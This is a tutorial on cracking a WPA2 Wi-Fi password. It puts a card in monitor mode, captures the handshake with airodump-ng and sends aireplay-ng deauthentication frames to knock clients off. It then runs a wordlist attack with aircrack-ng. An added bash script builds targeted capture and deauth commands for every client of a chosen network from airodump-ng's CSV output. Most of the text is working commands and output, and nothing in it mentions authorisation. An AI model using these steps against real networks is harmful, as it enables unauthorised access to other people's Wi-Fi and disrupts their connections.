Install aircrack-ng from your package manager.
Ex: sudo apt install aircrack-ng
First get your wireless interface name with
ip link
Here mine is wlan0, so put it into monitor mode with
sudo airmon-ng start wlan0
Confirm that a wlan0mon interface now shows up in ip link.
If it did not change to wlan0mon, the usual cause is a network manager or wpa_supplicant still holding the interface. Kill them with the following command
sudo airmon-ng check kill
and then try again. Note that this stops NetworkManager and wpa_supplicant, so your normal Wi-Fi connection is gone until you take the interface out of monitor mode (airmon-ng has a stop subcommand for that) and restart NetworkManager when you are done.
Start your first scan with the following command:
sudo airodump-ng wlan0mon
Which will show something similar to this (airodump-ng hops across channels while scanning, hence the changing CH value in the header):

 CH 14 ][ Elapsed: 0 s ][ 2022-09-27 18:47

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC   CIPHER  AUTH  ESSID

 12:34:56:78:90:AB    0        3        0    0   6  130  WPA2  CCMP    PSK   WIFI NAVN

 BSSID              STATION            PWR   Rate     Lost   Frames  Notes  Probes

 12:34:56:78:90:AB  DE:AD:F0:0D:12:34  -37    1e- 6e      0        4

The upper table lists access points, the lower table lists stations (clients) and the BSSID each one is associated with. We will refer back to this later!
We need to gather the following information from the scan in order to start listening for a handshake:
- Network BSSID (the access point's MAC address)
- Network channel (the CH column)
Afterwards we put the data into the following command
sudo airodump-ng --bssid <bssid> -c <channel> -w <output_file> wlan0mon
We can get the data from the example above: the BSSID is 12:34:56:78:90:AB and the channel (CH column) is 6. So the final command would be something like this:
sudo airodump-ng --bssid 12:34:56:78:90:AB -c 6 -w out wlan0mon
Leave this running. The interface is now pinned to channel 6, and when a handshake is captured airodump-ng prints "WPA handshake: 12:34:56:78:90:AB" in the top right corner of its header. Waiting passively only works if a client (re)connects on its own, so while it is listening, open a second terminal and start deauthing.
sudo aireplay-ng -0 2 -a <bssid> [-c <station>] wlan0mon
The -0 2 means two deauthentication bursts; the last argument is the monitor interface, which must be on the target's channel (it is, because airodump-ng pinned it with -c). You can include a station (a client MAC from the lower table of the scan) if you want to. A targeted deauth is more likely to succeed than a broadcast one, and it only makes sense if a client is actually connected, since the handshake you want is that client reconnecting.
sudo aireplay-ng -0 2 -a 12:34:56:78:90:AB -c DE:AD:F0:0D:12:34 wlan0mon
aireplay-ng reports how many ACKs it saw for each burst, which tells you whether the frames are reaching the AP and the station at all. Keep repeating this (and maybe physically move closer to the router) until you get a WPA handshake in the previous window. If it never works, the network may be using 802.11w (Protected Management Frames), in which case clients ignore unauthenticated deauth frames and you can only wait for a natural reconnect.
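The two steps above (read the BSSID and channel of the target off the scan, then build the airodump-ng and aireplay-ng lines for it and each of its clients) are easy to get wrong by hand when the scan is crowded. The following script is an added example, not part of the original page: it parses the CSV that airodump-ng writes next to the .cap when started with -w (out-01.csv for -w out) and prints the exact commands. The CSV embedded in sample_csv is constructed to mirror the scan shown earlier; the column layout (", "-separated, an access-point table followed by a "Station MAC" table) is airodump-ng's real CSV format. The interface name wlan0mon and the output prefix out are assumed defaults.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): pick the target AP and its
# stations out of an airodump-ng CSV and build the capture/deauth commands.
set -eu

IFACE="${IFACE:-wlan0mon}"   # assumed monitor interface name

# Constructed sample of airodump-ng's "-w" CSV output, not a real capture.
sample_csv() {
  cat <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
12:34:56:78:90:AB, 2022-09-27 18:47:00, 2022-09-27 18:47:30,  6, 130, WPA2, CCMP, PSK, -40,        3,        0,   0.  0.  0.  0,   9, WIFI NAVN, 
AA:BB:CC:DD:EE:FF, 2022-09-27 18:47:01, 2022-09-27 18:47:30, 11,  54, WPA2, CCMP, PSK, -70,        2,        0,   0.  0.  0.  0,   8, Neighbor, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:F0:0D:12:34, 2022-09-27 18:47:00, 2022-09-27 18:47:30, -37,        4, 12:34:56:78:90:AB,
11:22:33:44:55:66, 2022-09-27 18:47:05, 2022-09-27 18:47:29, -60,        9, AA:BB:CC:DD:EE:FF,
EOF
}

# ap_info <csv> <essid>: print "<bssid> <channel>" for an exact ESSID match.
# Only the AP table (everything before the "Station MAC" header) is searched.
ap_info() {
  awk -F', ' -v essid="$2" '
    /^Station MAC/ { exit }                       # end of the AP table
    NF >= 14 && $14 == essid { gsub(/ /, "", $4); print $1, $4; exit }
  ' "$1"
}

# ap_stations <csv> <bssid>: print the MAC of every station associated
# with that BSSID, one per line. The BSSID column carries a trailing comma
# (the probed-ESSID list follows it), so it is stripped before comparing.
ap_stations() {
  awk -F', ' -v bssid="$2" '
    in_st && NF >= 6 { b = $6; sub(/,.*$/, "", b); if (b == bssid) print $1 }
    /^Station MAC/ { in_st = 1 }                  # station table starts here
  ' "$1"
}

# build_commands <csv> <essid> [out-prefix]: print the airodump-ng capture
# line, then one targeted aireplay-ng deauth line per associated station.
# Returns 1 if the ESSID is not in the scan.
build_commands() {
  local csv="$1" essid="$2" out="${3:-out}" bssid ch sta
  set -- $(ap_info "$csv" "$essid")
  [ "$#" -eq 2 ] || { echo "ESSID not found in scan: $essid" >&2; return 1; }
  bssid="$1"; ch="$2"
  echo "sudo airodump-ng --bssid $bssid -c $ch -w $out $IFACE"
  ap_stations "$csv" "$bssid" | while read -r sta; do
    echo "sudo aireplay-ng -0 2 -a $bssid -c $sta $IFACE"
  done
}

# Demo on the constructed scan: target "WIFI NAVN" as in the walkthrough.
tmp="$(mktemp)"; trap 'rm -f "$tmp"' EXIT
sample_csv > "$tmp"
build_commands "$tmp" "WIFI NAVN" out
```

Point it at a real scan with build_commands out-01.csv "<essid>" after the first airodump-ng run has been writing for a few seconds. An ESSID that appears with no station lines is one you can only capture by waiting, so the script printing just the airodump-ng line is itself a useful signal before you start sending deauth frames.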
Once you have the handshake, we just have to get cracking. Capturing the handshake does not reveal the key; it only gives you enough material to test password guesses offline, so you need a wordlist that contains the password. Find one (such as rockyou.txt) and then execute the following command:
aircrack-ng -w <wordlist> <output_file>-01.cap
Where <output_file> is the prefix you gave to -w in the listening step (out in the example, so the capture is out-01.cap; airodump-ng numbers the files so that repeated runs do not overwrite each other). Running aircrack-ng on the .cap without a wordlist first is a cheap sanity check: it lists every BSSID in the capture and how many handshakes it found for each.
Give this some time. Each guess costs a PBKDF2 derivation, so the speed depends entirely on your CPU, and if the password was in the wordlist it will have cracked the password. Here is an example of that screen:
                               Aircrack-ng 1.7

      [00:00:00] 891019/10303727 keys tested (2175.29 k/s)

      Time left: 1 hour, 18 minutes, 56 seconds                      0.00%

                           KEY FOUND! [ 13370420 ]

      Master Key     : DF 10 44 52 7C 59 22 F3 67 DC 83 0D CF 92 05 AE
                       23 81 70 A1 96 1C 4E F7 98 2A D2 F5 50 1D E9 CE

      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

      EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Here the Wi-Fi password (the WPA2 pre-shared key) is 13370420. The Master Key line is the PMK derived from that passphrase and the ESSID; the Transient Key and EAPOL HMAC are zeroed in this example output.